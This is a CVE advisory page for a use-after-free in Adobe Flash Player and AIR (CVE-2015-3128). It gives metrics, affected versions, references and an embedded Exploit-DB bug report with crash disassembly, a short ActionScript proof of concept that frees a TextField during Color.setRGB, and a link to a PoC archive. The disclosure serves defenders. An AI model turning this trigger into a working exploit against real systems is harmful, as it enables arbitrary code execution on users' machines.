CVE-2015-3128 : Detail

CVE-2015-3128

67.6%V3
Network
2015-07-09
14h00 +00:00
2017-09-21
07h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK & Compiler before 18.0.0.180 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-3118, CVE-2015-3124, CVE-2015-3127, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, and CVE-2015-5117.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37860

Publication date : 2015-08-18 22h00 +00:00
Author : bilou
EDB Verified : Yes

Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack. VERSION Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169 Operating System: Win7 x64 SP1 REPRODUCTION CASE The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF. (These lines come from flashplayer17_sa.exe 17.0.0.169): .text:004B82D0 push esi .text:004B82D1 mov esi, [esp+4+arg_0] .text:004B82D5 push edi .text:004B82D6 mov edi, ecx .text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory .text:004B82DE and ecx, 0FFFFFFFEh .text:004B82E1 add ecx, 3Ch .text:004B82E4 mov eax, esi .text:004B82E6 call sub_4B0724 ; crash below ... .text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer) .text:004B0726 cmp edx, [eax] .text:004B0728 jnz short loc_4B077E Compile the poc with Flash CS5.5 *************************************************************************** Content of as2_color_uaf.fla: var tf:TextField = this.createTextField("tf",1,1,1,4,4) var o = new Object() o.valueOf = function () { tf.removeTextField() return 0x41414142 } var c = new Color(tf) c.setRGB(o) --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip

Products Mentioned

Configuraton 0

Adobe>>Air >> Version To (including) 18.0.0.144

Adobe>>Air_sdk >> Version To (including) 18.0.0.144

Adobe>>Air_sdk_\&_compiler >> Version To (including) 18.0.0.144

Configuraton 0

Adobe>>Flash_player >> Version To (including) 13.0.0.289

Adobe>>Flash_player >> Version 14.0.0.125

Adobe>>Flash_player >> Version 14.0.0.145

Adobe>>Flash_player >> Version 14.0.0.176

Adobe>>Flash_player >> Version 14.0.0.179

Adobe>>Flash_player >> Version 15.0.0.152

Adobe>>Flash_player >> Version 15.0.0.167

Adobe>>Flash_player >> Version 15.0.0.189

Adobe>>Flash_player >> Version 15.0.0.223

Adobe>>Flash_player >> Version 15.0.0.239

Adobe>>Flash_player >> Version 15.0.0.246

Adobe>>Flash_player >> Version 16.0.0.235

Adobe>>Flash_player >> Version 16.0.0.257

Adobe>>Flash_player >> Version 16.0.0.287

Adobe>>Flash_player >> Version 16.0.0.296

Adobe>>Flash_player >> Version 17.0.0.134

Adobe>>Flash_player >> Version 17.0.0.169

Adobe>>Flash_player >> Version 17.0.0.188

Adobe>>Flash_player >> Version 17.0.0.190

Adobe>>Flash_player >> Version 18.0.0.160

Adobe>>Flash_player >> Version 18.0.0.194

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Adobe>>Flash_player >> Version To (including) 11.2.202.468

Linux>>Linux_kernel >> Version -

References

http://www.securitytracker.com/id/1032810
Tags : vdb-entry, x_refsource_SECTRACK
http://rhn.redhat.com/errata/RHSA-2015-1214.html
Tags : vendor-advisory, x_refsource_REDHAT
https://security.gentoo.org/glsa/201507-13
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securityfocus.com/bid/75590
Tags : vdb-entry, x_refsource_BID